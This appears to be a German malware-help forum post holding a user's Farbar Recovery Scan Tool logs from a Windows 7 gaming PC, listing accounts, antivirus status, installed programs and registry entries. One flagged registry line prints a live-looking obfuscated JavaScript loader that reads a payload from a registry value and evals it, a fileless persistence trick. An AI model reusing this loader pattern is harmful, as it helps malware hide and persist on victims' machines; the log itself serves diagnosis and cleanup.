==================== Dateien im Wurzelverzeichnis einiger Verzeichnisse =======

2017-02-10 19:24 - 2017-02-10 19:24 - 000000824 _____ () C:\Users\***\AppData\Local\recently-used.xbel
2017-08-08 17:48 - 2017-08-08 17:48 - 000000017 _____ () C:\Users\***\AppData\Local\resmon.resmoncfg
2016-11-05 23:04 - 2016-11-05 23:04 - 000000141 _____ () C:\ProgramData\Microsoft.SqlServer.Compact.400.32.bc

==================== Bamital & volsnap ======================

(Es ist kein automatischer Fix für Dateien vorhanden, die an der Verifikation gescheitert sind.)
C:\WINDOWS\system32\winlogon.exe => Datei ist digital signiert
C:\WINDOWS\system32\wininit.exe => Datei ist digital signiert
C:\WINDOWS\SysWOW64\wininit.exe FEHLT <==== ACHTUNG
C:\WINDOWS\explorer.exe => Datei ist digital signiert
C:\WINDOWS\SysWOW64\explorer.exe => Datei ist digital signiert
C:\WINDOWS\system32\svchost.exe => Datei ist digital signiert
C:\WINDOWS\SysWOW64\svchost.exe => Datei ist digital signiert
C:\WINDOWS\system32\services.exe => Datei ist digital signiert
C:\WINDOWS\system32\User32.dll => Datei ist digital signiert
C:\WINDOWS\SysWOW64\User32.dll => Datei ist digital signiert
C:\WINDOWS\system32\userinit.exe => Datei ist digital signiert
C:\WINDOWS\SysWOW64\userinit.exe => Datei ist digital signiert
C:\WINDOWS\system32\rpcss.dll => Datei ist digital signiert
C:\WINDOWS\system32\dnsapi.dll => Datei ist digital signiert
C:\WINDOWS\SysWOW64\dnsapi.dll => Datei ist digital signiert
C:\WINDOWS\system32\Drivers\volsnap.sys => Datei ist digital signiert

LastRegBack: 2017-08-07 19:33

==================== Ende von FRST.txt ============================ |
09.08.2017, 18:07 | #28 |
| Addition
Code:
Zusätzliches Untersuchungsergebnis von Farbar Recovery Scan Tool (x64) Version: 09-08-2017
durchgeführt von ***** (09-08-2017 19:01:53)
Gestartet von C:\Users\*****\Desktop
Windows 7 Ultimate (X64) (2017-04-19 18:18:33)
Start-Modus: Normal
==========================================================

==================== Konten: =============================

Administrator (S-1-5-21-1566530412-1856523912-1524002813-500 - Administrator - Disabled)
DefaultAccount (S-1-5-21-1566530412-1856523912-1524002813-503 - Limited - Disabled)
Gast (S-1-5-21-1566530412-1856523912-1524002813-501 - Limited - Disabled)
***** (S-1-5-21-1566530412-1856523912-1524002813-1001 - Administrator - Enabled) => C:\Users\*****

==================== Sicherheits-Center ========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er entfernt.)

AV: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Installierte Programme ======================

(Nur Adware-Programme mit dem Zusatz "Hidden" können in die Fixlist aufgenommen werden, um sie sichtbar zu machen. Die Adware-Programme sollten manuell deinstalliert werden.)

Akamai NetSession Interface (HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\Akamai) (Version: - Akamai Technologies, Inc)
Ansel (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Ansel) (Version: 384.94 - NVIDIA Corporation) Hidden
ARK: Survival Evolved (HKLM\...\Steam App 346110) (Version: - Studio Wildcard)
Asmedia ASM104x USB 3.0 Host Controller Driver (HKLM-x32\...\{E4FB0B39-C991-4EE7-95DD-1A1A7857D33D}) (Version: 1.16.12.0 - Asmedia Technology)
AVerMedia C353 HD Capture Device 3.3.64.53 (HKLM-x32\...\AVerMedia C353 HD Capture Device) (Version: 3.3.64.53 - AVerMedia TECHNOLOGIES, Inc.)
Battle.net (HKLM-x32\...\Battle.net) (Version: - Blizzard Entertainment)
Borderlands 2 (HKLM-x32\...\Steam App 49520) (Version: - Gearbox Software)
CameraHelperMsi (HKLM-x32\...\{15634701-BACE-4449-8B25-1567DA8C9FD3}) (Version: 13.51.815.0 - Logitech) Hidden
CCleaner (HKLM\...\CCleaner) (Version: 5.32 - Piriform)
Darkest Dungeon (HKLM-x32\...\1450711444_is1) (Version: 20340 - GOG.com)
Discord (HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\Discord) (Version: 0.0.297 - Hammer & Chisel, Inc.)
Dragon Age™: Inquisition (HKLM-x32\...\{DC4C36DC-4E5B-4262-B0C7-157DF534B969}) (Version: 1.0.0.12 - Electronic Arts)
Dropbox (HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\Dropbox) (Version: 32.4.21 - Dropbox, Inc.)
Dual-Core Optimizer (HKLM-x32\...\{9FD6F1A8-5550-46AF-8509-271DF0E768B5}) (Version: 1.1.4.0169 - AMD)
Elite Dangerous: Horizons (HKLM-x32\...\Steam App 419270) (Version: - Frontier Developments)
Elite: Dangerous (HKLM-x32\...\Steam App 359320) (Version: - Frontier Developments)
Endless Space (HKLM-x32\...\Steam App 208140) (Version: - AMPLITUDE Studios)
erLT (HKLM-x32\...\{3EE9BCAE-E9A9-45E5-9B1C-83A4D357E05C}) (Version: 1.20.138.34 - Logitech, Inc.) Hidden
EVE Online (HKLM\...\Steam App 8500) (Version: - CCP)
Fallout 4 (HKLM-x32\...\Steam App 377160) (Version: - Bethesda Game Studios)
ForHonor (HKLM-x32\...\Uplay Install 569) (Version: - Ubisoft)
Galactic Civilizations III (HKLM\...\Steam App 226860) (Version: - Stardock Entertainment)
GameLauncherRemoval (KCD Beta Access) (HKLM-x32\...\{64189CD8-0B86-4F81-9C05-584E60386D66}) (Version: 1.0.0.0 - Warhorse Studios) Hidden
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 60.0.3112.90 - Google Inc.)
Google Photos Backup (HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\Google Photos Backup) (Version: 1.1.2.13 - Google, Inc.)
Google Update Helper (HKLM-x32\...\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}) (Version: 1.3.33.5 - Google Inc.) Hidden
Guild Wars 2 (HKLM-x32\...\Guild Wars 2) (Version: - NCsoft Corporation, Ltd.)
Hearthstone (HKLM-x32\...\Hearthstone) (Version: - Blizzard Entertainment)
Heroes of the Storm (HKLM-x32\...\Heroes of the Storm) (Version: - Blizzard Entertainment)
HiPatch (HKLM-x32\...\{3C87E0FF-BC0A-4F5E-951B-68DC3F8DF000}) (Version: 5.0.3.9 - Hi-Rez Studios)
Hi-Rez Studios Authenticate and Update Service (HKLM-x32\...\{3C87E0FF-BC0A-4F5E-951B-68DC3F8DF1FC}) (Version: 3.0.0.0 - Hi-Rez Studios)
Intel(R) Management Engine Components (HKLM\...\{1CEAC85D-2590-4760-800F-8DE5E91F3700}) (Version: 10.0.28.1006 - Intel Corporation)
Intel(R) Rapid Storage Technology (HKLM\...\{409CB30E-E457-4008-9B1A-ED1B9EA21140}) (Version: 13.1.0.1058 - Intel Corporation)
Intel(R) Update Manager (HKLM-x32\...\{B991A1BC-DE0F-41B3-9037-B2F948F706EC}) (Version: 3.1.1228 - Intel Corporation)
Java 8 Update 144 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F32180144F0}) (Version: 8.0.1440.1 - Oracle Corporation)
KCD Beta Access (HKLM-x32\...\{d2fb0ffd-876a-49ad-a428-fbb255d5d8d2}) (Version: 4.0 - Warhorse Studios)
KCD Beta Access (HKLM-x32\...\{FD95EDF6-7B9F-4BD1-8DAD-63D8BDD45B96}) (Version: 4.0 - Warhorse Studios) Hidden
League of Legends (HKLM-x32\...\{517CC397-B22F-4593-8DCB-DE72CC541E9A}) (Version: 3.0.1 - Riot Games ) Hidden
League of Legends (HKLM-x32\...\League of Legends 3.0.1) (Version: 3.0.1 - Riot Games )
LEGO® Der Herr der Ringe™ (HKLM-x32\...\{C6F20FA7-342A-47A9-A3C8-EB36CABE6419}) (Version: 1.0.0.0 - Warner Bros. Interactive Entertainment)
Logitech Gaming Software 8.92 (HKLM\...\Logitech Gaming Software) (Version: 8.92.67 - Logitech Inc.)
Logitech SetPoint 6.67 (HKLM\...\sp6) (Version: 6.67.83 - Logitech)
Logitech Webcam-Software (HKLM-x32\...\{D40EB009-0499-459c-A8AF-C9C110766215}) (Version: 2.80 - Logitech Inc.)
Manager (HKLM-x32\...\{2D00EBC4-DD22-4F5B-9BA1-F98ED2C6FCF2}) (Version: 5.0.15.31893 - 2017 pdfforge GmbH. All rights reserved) Hidden
Master of Orion (HKLM\...\Steam App 298050) (Version: - NGD Studios)
Microsoft Games for Windows - LIVE Redistributable (HKLM-x32\...\{F2508213-9989-4E85-A078-72BE483917EF}) (Version: 3.5.88.0 - Microsoft Corporation)
Microsoft Games for Windows Marketplace (HKLM-x32\...\{4CB0307C-565E-4441-86BE-0DF2E4FB828C}) (Version: 3.5.50.0 - Microsoft Corporation)
Microsoft LifeCam (HKLM\...\{5CE7E3F5-9803-4F32-AA89-2D8848A80109}) (Version: 3.60.253.0 - Microsoft Corporation)
Microsoft OneDrive (HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\OneDriveSetup.exe) (Version: 17.3.6816.0313 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{837b34e3-7c30-493c-8f6a-2b0f04e2912c}) (Version: 8.0.59193 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{6ce5bae9-d3ca-4b99-891a-1dc6c118a5fc}) (Version: 8.0.59192 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022 (HKLM-x32\...\{FF66E9F6-83E7-3A3E-AF14-8DE9A809A6A4}) (Version: 9.0.21022 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{3c3aafc8-d898-43ec-998f-965ffdae065a}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.24215 (HKLM-x32\...\{d992c12e-cab2-426f-bde3-fb8c53950b0d}) (Version: 14.0.24215.1 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.24215 (HKLM-x32\...\{e2803110-78b3-4664-a479-3611a381656a}) (Version: 14.0.24215.1 - Microsoft Corporation)
Microsoft XNA Framework Redistributable 4.0 (HKLM-x32\...\{2BFC7AA0-544C-4E3A-8796-67F3BE655BE9}) (Version: 4.0.20823.0 - Microsoft Corporation)
Minecraft (HKLM-x32\...\{1C16BCA3-EBC1-49F6-8623-8FBFB9CCC872}) (Version: 1.0.3.0 - Mojang)
Minion (HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\{Minion}}_is1) (Version: 3.0 - Good Game Mods LLC)
Mordheim: City of the Damned (HKLM-x32\...\Steam App 276810) (Version: - Rogue Factor)
MSXML 4.0 SP2 Parser and SDK (HKLM-x32\...\{716E0306-8318-4364-8B8F-0CC4E9376BAC}) (Version: 4.20.9818.0 - Microsoft Corporation)
MyPhoneExplorer (HKLM-x32\...\MPE) (Version: 1.8.8 - F.J. Wechselberger)
No Man's Sky (HKLM\...\Steam App 275850) (Version: - Hello Games)
NVIDIA 3D Vision Controller-Treiber 369.04 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.NVIRUSB) (Version: 369.04 - NVIDIA Corporation)
NVIDIA 3D Vision Treiber 384.94 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.3DVision) (Version: 384.94 - NVIDIA Corporation)
NVIDIA GeForce Experience 3.8.0.89 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.GFExperience) (Version: 3.8.0.89 - NVIDIA Corporation)
NVIDIA Grafiktreiber 384.94 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 384.94 - NVIDIA Corporation)
NVIDIA HD-Audiotreiber 1.3.34.27 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_HDAudio.Driver) (Version: 1.3.34.27 - NVIDIA Corporation)
NVIDIA Miracast Virtueller Ton 355.82 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Miracast.VirtualAudio) (Version: 355.82 - NVIDIA Corporation)
NVIDIA PhysX-Systemsoftware 9.17.0524 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX) (Version: 9.17.0524 - NVIDIA Corporation)
NvvHci (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_NvvHci) (Version: 2.02.0.5 - NVIDIA Corporation) Hidden
OLYMPUS Digital Camera Updater (HKLM-x32\...\{962428F4-2E99-4AD2-B55D-B468C18A8A89}) (Version: 2.0.0 - Olympus Corporation)
OpenAL (HKLM-x32\...\OpenAL) (Version: - )
OpenOffice 4.1.3 (HKLM-x32\...\{8D5FCC56-BB9F-4122-923C-71753F50F6F5}) (Version: 4.13.9783 - Apache Software Foundation)
Origin (HKLM-x32\...\Origin) (Version: 10.4.16.25850 - Electronic Arts, Inc.)
Platform (HKLM-x32\...\{20D4A895-748C-4D88-871C-FDB1695B0169}) (Version: 1.42 - VIA Technologies, Inc.) Hidden
PunkBuster Services (HKLM-x32\...\PunkBusterSvc) (Version: 0.991 - Even Balance, Inc.)
Qualcomm Atheros 11AC Drivers (HKLM\...\{45724D31-7270-4A0B-B236-5119CFDA42DB}) (Version: 1.1.47.1058 - Qualcomm Atheros) Hidden
Qualcomm Atheros 61x4 Bluetooth Suite (64) (HKLM\...\{628988B4-3FA5-4EA6-BAA3-DA640F6718BD}) (Version: 3.0.0.357 - Qualcomm Atheros)
Qualcomm Atheros Bandwidth Control Filter Driver (HKLM\...\{42F56083-A726-4599-A231-EF6200A39AF6}) (Version: 1.1.47.1058 - Qualcomm Atheros) Hidden
Qualcomm Atheros Killer E220x Drivers (HKLM\...\{1CC47E9F-A34A-44B3-8C5A-D45C1A3CB94C}) (Version: 1.1.47.1058 - Qualcomm Atheros) Hidden
Qualcomm Atheros Killer Performance Suite (HKLM-x32\...\{E70DB50B-10B4-46BC-9DE2-AB8B49E061EE}) (Version: 1.1.47.1058 - Qualcomm Atheros)
Qualcomm Atheros Network Manager (HKLM\...\{A32F7F52-0DC5-40EF-84BD-7D30CC20D157}) (Version: 1.1.47.1058 - Qualcomm Atheros) Hidden
Rayman Origins (HKLM-x32\...\Uplay Install 80) (Version: - Ubisoft)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.8036 - Realtek Semiconductor Corp.)
Revo Uninstaller 2.0.3 (HKLM\...\{A28DBDA2-3CC7-4ADC-8BFE-66D7743C6C97}_is1) (Version: 2.0.3 - VS Revo Group, Ltd.)
Rise of the Tomb Raider (HKLM\...\Steam App 391220) (Version: - Crystal Dynamics)
Samsung Kies (HKLM-x32\...\{758C8301-2696-4855-AF45-534B1200980A}) (Version: 2.6.4.16113.3 - Samsung Electronics Co., Ltd.) Hidden
Samsung Kies (HKLM-x32\...\InstallShield_{758C8301-2696-4855-AF45-534B1200980A}) (Version: 2.6.4.16113.3 - Samsung Electronics Co., Ltd.)
Samsung USB Driver for Mobile Phones (HKLM\...\{D0795B21-0CDA-4a92-AB9E-6E92D8111E44}) (Version: 1.5.61.0 - Samsung Electronics Co., Ltd.)
SimCity™ (HKLM-x32\...\{F70FDE4B-8F86-4eb6-8C8E-636EC89F6419}) (Version: 4.0.98.0213 - Electronic Arts)
Skype Click to Call (HKLM-x32\...\{873F8E7C-10E6-449F-BD7E-5FBA7C8E1C9B}) (Version: 8.5.0.9167 - Microsoft Corporation)
Skype Web Plugin (HKLM-x32\...\{E8A70371-2C4D-4B12-831D-6A4BB9AC7AEF}) (Version: 7.29.0.73 - Skype Technologies S.A.)
Skype™ 7.38 (HKLM-x32\...\{3B7E914A-93D5-4A29-92BB-AF8C3F66C431}) (Version: 7.38.101 - Skype Technologies S.A.)
Smart Switch (HKLM-x32\...\{74FA5314-85C8-4E2A-907D-D9ECCCB770A7}) (Version: 4.1.17054.16 - Samsung Electronics Co., Ltd.) Hidden
Smart Switch (HKLM-x32\...\InstallShield_{74FA5314-85C8-4E2A-907D-D9ECCCB770A7}) (Version: 4.1.17054.16 - Samsung Electronics Co., Ltd.)
Smart Technology Programming Software 7.0.27.13 (HKLM\...\{C9193CBB-C31A-412A-A074-AD08F0F2CF3D}) (Version: 7.0.27.13 - Mad Catz)
Smite (HKLM-x32\...\{3C87E0FF-BC0A-4F5E-951B-68DC3F8DF017}) (Version: 4.14.4229.4 - Hi-Rez Studios)
Spotify (HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\Spotify) (Version: 1.0.53.758.gde3fc4b2 - Spotify AB)
Star Citizen Launcher (HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\Star Citizen Launcher) (Version: 00.01.00.00 - Cloud Imperium Games)
STAR WARS™ Battlefront™ (HKLM-x32\...\{E402D891-4E45-4ce9-B41F-DD35864EF170}) (Version: 1.0.7.64833 - Electronic Arts)
StarCraft II (HKLM-x32\...\StarCraft II) (Version: - Blizzard Entertainment)
Steam (HKLM-x32\...\Steam) (Version: 2.10.91.91 - Valve Corporation)
Steuer St.Gallen 2016 nP 1.6.0 (HKLM-x32\...\0222-4883-7289-1667) (Version: 1.6.0 - Information Factory AG)
TeamSpeak 3 Client (HKLM-x32\...\TeamSpeak 3 Client) (Version: 3.0.16 - TeamSpeak Systems GmbH)
Terraria (HKLM-x32\...\Steam App 105600) (Version: - Re-Logic)
The Elder Scrolls Online (HKLM-x32\...\The Elder Scrolls Online) (Version: 1.0.0.0 - Zenimax Online Studios)
The Long Dark (HKLM\...\Steam App 305620) (Version: - Hinterland Studio Inc.)
The Witcher 3 - Wild Hunt (HKLM-x32\...\1207664643_is1) (Version: 1.31.0.0 - GOG.com)
The Witcher 3: Wild Hunt - Blood and Wine (HKLM-x32\...\Blood and Wine_is1) (Version: 1.24.0.0 - GOG.com)
The Witcher 3: Wild Hunt - Free DLC program (16 DLC) (HKLM-x32\...\Free DLC program (16 DLC)_is1) (Version: 1.24.0.0 - GOG.com)
The Witcher 3: Wild Hunt - Hearts of Stone (HKLM-x32\...\Hearts of Stone_is1) (Version: 1.24.0.0 - GOG.com)
Tom Clancy's The Division (HKLM\...\Steam App 365590) (Version: - Massive Entertainment)
TomTom MyDrive Connect 4.1.6.3229 (HKLM-x32\...\MyDriveConnect) (Version: 4.1.6.3229 - TomTom)
Total War™: WARHAMMER® (HKLM\...\Steam App 364360) (Version: - Creative Assembly)
Tyranny (HKLM\...\Steam App 362960) (Version: - Obsidian Entertainment)
Uplay (HKLM-x32\...\Uplay) (Version: 5.1 - Ubisoft)
VIA Plattform-Geräte-Manager (HKLM-x32\...\InstallShield_{20D4A895-748C-4D88-871C-FDB1695B0169}) (Version: 1.42 - VIA Technologies, Inc.)
Visual Studio C++ 10.0 Runtime (HKLM-x32\...\{4412F224-3849-4461-A3E9-DEEF8D252790}) (Version: 10.0.0 - TomTom International B.V.)
VoiceAttack (HKLM-x32\...\{75E13F4F-139E-4CCA-A5A5-7476E4C5484D}) (Version: 1.4 - VoiceAttack.com)
Vulkan Run Time Libraries 1.0.3.0 (HKLM\...\VulkanRT1.0.3.0) (Version: 1.0.3.0 - LunarG, Inc.)
Vulkan Run Time Libraries 1.0.42.1 (HKLM\...\VulkanRT1.0.42.1) (Version: 1.0.42.1 - LunarG, Inc.)
Warframe (HKLM-x32\...\{EE130AB8-143A-4AA2-B81A-79EC1623C899}) (Version: 1.0.0 - Digital Extremes)
Warhammer 40,000: Dawn of War III (HKLM\...\Steam App 285190) (Version: - Relic Entertainment)
Warhammer: End Times - Vermintide (HKLM\...\Steam App 235540) (Version: - Fatshark)
WestwoodOnline (HKLM-x32\...\{BBCD6D56-8A26-4DDE-9482-DBC9C7B7341D}) (Version: - )
Windows 10 Update and Privacy Settings (HKLM\...\{293F2009-0145-450B-B4AA-063D43FB368C}) (Version: 1.0.13.0 - Microsoft Corporation)
Wolfenstein: The New Order German Edition (HKLM-x32\...\Steam App 288570) (Version: - MachineGames)

==================== Benutzerdefinierte CLSID (Nicht auf der Ausnahmeliste): ==========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

CustomCLSID: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001_Classes\CLSID\{005A3A96-BAC4-4B0A-94EA-C0CE100EA736}\localserver32 -> C:\Users\*****\AppData\Roaming\Dropbox\bin\Dropbox.exe (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001_Classes\CLSID\{144DF3B2-2402-47AE-9583-5A045929A8D4}\InprocServer32 -> C:\Users\*****\AppData\Local\Google\Update\1.3.33.5\psuser_64.dll (Google Inc.)
CustomCLSID: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001_Classes\CLSID\{A03A51A2-5B59-4ECE-96D1-037F7F2A0D8F}\localserver32 -> C:\Users\*****\AppData\Local\SkypePlugin\7.29.0.73\GatewayVersion-x64.exe (Skype Technologies S.A.)
CustomCLSID: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001_Classes\CLSID\{CBF9CD8C-2714-4F36-B76A-43E6C7547BC2}\localserver32 -> C:\Users\*****\AppData\Local\SkypePlugin\7.29.0.73\EdgeCalling.exe (Skype Technologies S.A.)
CustomCLSID: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001_Classes\CLSID\{E8CF3E55-F919-49D9-ABC0-948E6CB34B9F}\InprocServer32 -> C:\Users\*****\AppData\Local\Google\Update\1.3.33.5\psuser_64.dll (Google Inc.)
CustomCLSID: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001_Classes\CLSID\{ECD97DE5-3C8F-4ACB-AEEE-CCAB78F7711C}\InprocServer32 -> C:\Users\*****\AppData\Roaming\Dropbox\bin\DropboxExt64.18.0.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001_Classes\CLSID\{FB314ED9-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\*****\AppData\Roaming\Dropbox\bin\DropboxExt64.18.0.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001_Classes\CLSID\{FB314EDA-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\*****\AppData\Roaming\Dropbox\bin\DropboxExt64.18.0.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001_Classes\CLSID\{FB314EDB-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\*****\AppData\Roaming\Dropbox\bin\DropboxExt64.18.0.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001_Classes\CLSID\{FB314EDC-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\*****\AppData\Roaming\Dropbox\bin\DropboxExt64.18.0.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001_Classes\CLSID\{FB314EDD-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\*****\AppData\Roaming\Dropbox\bin\DropboxExt64.18.0.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001_Classes\CLSID\{FB314EDE-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\*****\AppData\Roaming\Dropbox\bin\DropboxExt64.18.0.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001_Classes\CLSID\{FB314EDF-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\*****\AppData\Roaming\Dropbox\bin\DropboxExt64.18.0.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001_Classes\CLSID\{FB314EE0-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\*****\AppData\Roaming\Dropbox\bin\DropboxExt64.18.0.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001_Classes\CLSID\{FB314EE1-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\*****\AppData\Roaming\Dropbox\bin\DropboxExt64.18.0.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001_Classes\CLSID\{FB314EE2-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\*****\AppData\Roaming\Dropbox\bin\DropboxExt64.18.0.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001_Classes\CLSID\{FBC9D74C-AF55-4309-9FB2-C426E071637F}\InprocServer32 -> C:\Users\*****\AppData\Roaming\Dropbox\bin\DropboxExt64.18.0.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001_Classes\CLSID\{FE0A3EA9-4DDA-4B0A-9981-5ABE8F0186CD}\InprocServer32 -> C:\Users\*****\AppData\Local\SkypePlugin\7.29.0.73\GatewayActiveX-x64.dll (Skype Technologies S.A.)
HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\Software\Classes\uwas: cmd.exe /c start "" "C:\Users\*****\AppData\Local\Wqy He\xfoqedfutx.hnen" "javascript:np5aj="n";j6Q0=new ActiveXObject("WScript.Shell");CJH0m="XMmT";Ku05Ci=j6Q0.RegRead("HKCU\\software\\lyndd\\jupmxfqiju");JQo0Sr="6SpeO0";eval(Ku05Ci);dYlGfd3="bB6tEkG";" <==== ACHTUNG
ShellIconOverlayIdentifiers: ["DropboxExt1"] -> {FB314ED9-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\*****\AppData\Roaming\Dropbox\bin\DropboxExt64.18.0.dll [2017-08-08] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: ["DropboxExt2"] -> {FB314EDA-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\*****\AppData\Roaming\Dropbox\bin\DropboxExt64.18.0.dll [2017-08-08] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: ["DropboxExt3"] -> {FB314EDD-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\*****\AppData\Roaming\Dropbox\bin\DropboxExt64.18.0.dll [2017-08-08] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: ["DropboxExt4"] -> {FB314EDE-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\*****\AppData\Roaming\Dropbox\bin\DropboxExt64.18.0.dll [2017-08-08] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: ["DropboxExt5"] -> {FB314EDB-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\*****\AppData\Roaming\Dropbox\bin\DropboxExt64.18.0.dll [2017-08-08] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: ["DropboxExt6"] -> {FB314EDF-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\*****\AppData\Roaming\Dropbox\bin\DropboxExt64.18.0.dll [2017-08-08] (Dropbox, Inc.)
